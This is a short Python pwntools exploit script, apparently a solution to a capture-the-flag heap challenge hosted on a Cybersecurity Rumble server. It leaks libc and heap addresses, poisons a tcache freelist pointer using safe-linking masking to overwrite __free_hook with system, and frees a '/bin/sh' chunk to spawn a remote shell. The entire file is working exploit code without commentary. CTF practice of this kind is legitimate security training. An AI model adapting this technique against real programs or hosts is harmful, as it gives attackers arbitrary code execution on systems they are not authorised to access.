how_2_heap_expl.py

#!/usr/bin/python3
from pwn import *
from time import sleep
import random

def malloc(idx,size):
	io.sendlineafter('> ','1')
	io.sendlineafter('index: ',f'{idx}')
	io.sendlineafter('size: ',f'{size}')

def edit(idx,size,data):
	io.sendlineafter('> ','4')
	io.sendlineafter('index: ',f'{idx}')
	io.sendlineafter('size: ',f'{size}')
	io.send(data)

def free(idx):
	io.sendlineafter('> ','2')
	io.sendlineafter('index: ',f'{idx}')

def view(idx,size):
	io.sendlineafter('> ','3')
	io.sendlineafter('index: ',f'{idx}')
	io.sendlineafter('size: ',f'{size}')
	return io.recvn(size)

def mask(heapbase,target):
	return (heapbase >> 0xc) ^ target

#libc 2.32 ?
free_hook = 0x1c5ca0
system = 0x4a830
unsorted_bin_addr = 0x1c2a60

if __name__ == '__main__':
#	io = process('./h2heap',env={'LD_PRELOAD':libc.path})
	io = remote('chal.cybersecurityrumble.de',29546)
	malloc(0,0x18) #0
	malloc(1,0x418) #1
	malloc(2,0x18) #2
	malloc(3,0x18) #3
	malloc(4,0x28) #4
	malloc(5,0x28) #5
	malloc(6,0x28) #6
	free(1)

	libc_leak = u64(view(0,0x50)[0x20:0x28])
	libc_base = libc_leak - unsorted_bin_addr
	print(hex(libc_base))
	free(3)
	heap_leak = u64(view(2,0x50)[0x28:0x30]) - 0x10
	print(hex(heap_leak))

	free(6)
	free(5)
	edit(4,0x38,b'A'*0x28+p64(0x31)+p64(mask(heap_leak,libc_base+free_hook-0x10)))
	malloc(7,0x28) #7
	malloc(8,0x28) #8
	edit(8,0x18,b'/bin/sh\0'+b'A'*0x8+p64(libc_base+system))
#	pause()
	free(7)
	io.interactive()